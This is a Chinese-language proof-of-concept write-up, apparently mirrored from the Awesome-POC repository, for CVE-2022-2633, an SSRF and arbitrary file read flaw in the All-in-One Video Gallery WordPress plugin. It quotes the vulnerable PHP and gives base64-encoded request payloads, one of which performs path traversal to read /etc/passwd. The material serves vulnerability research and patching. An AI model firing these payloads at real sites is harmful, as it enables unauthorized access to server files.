admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/服务器应用漏洞/WordPress All-in-One Video Gallery video.php 任意文件读取漏洞 CVE-2022-2633.md
Threekiii cba0c4db58 更新漏洞
2022-12-05 11:09:28 +08:00

64 lines
1.7 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# WordPress All-in-One Video Gallery video.php 任意文件读取漏洞 CVE-2022-2633
## 漏洞描述
WordPress All-in-One Video 插件 Gallery video.php文件中存在SSRF以及任意文件读取漏洞攻击者通过发送特定的请求包读取任意文件
## 漏洞影响
```
WordPress All-in-One Video Gallery <= 2.6.0
```
## 插件名称
```
All-in-One Video Gallery
```
https://downloads.wordpress.org/plugin/all-in-one-video-gallery.2.6.0.zip
## 漏洞复现
对比漏洞修复的文件找到出现漏洞的文件 wp-content/plugins/all-in-one-video-gallery/public/video.php
![image-20221017170543356](./images/202210171705476.png)
这里接收 dl 参数dl 参数不为 数字类型时,参数将 base64 解码传入
```
if ( is_numeric( $_GET['dl'] ) ) {
$file = get_post_meta( (int) $_GET['dl'], 'mp4', true );
} else {
$file = base64_decode( $_GET['dl'] );
}
if ( empty( $file ) ) {
die( esc_html__( 'Download file URL is empty.', 'all-in-one-video-gallery' ) );
exit;
}
```
![image-20221017170604454](./images/202210171706536.png)
当传入的参数中不存在 http:// 或 https:// 时,参数 $formatted_path 的值改变
![image-20221017170622056](./images/202210171706133.png)
当 $formatted_path 为 url 时存在 SSRF漏洞传入 base64编码 的目标URL就可以得到回显
```
/index.php/video/?dl=aHR0cHM6Ly93d3cuYmFpZHUuY29t
```
![image-20221017170640788](./images/202210171706868.png)
看向代码最后的片段,则存在任意文件读取漏洞
![image-20221017170655893](./images/202210171706975.png)
```
/index.php/video/?dl=Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
```
![image-20221017170708523](./images/202210171707604.png)
Reference in New Issue View Git Blame Copy Permalink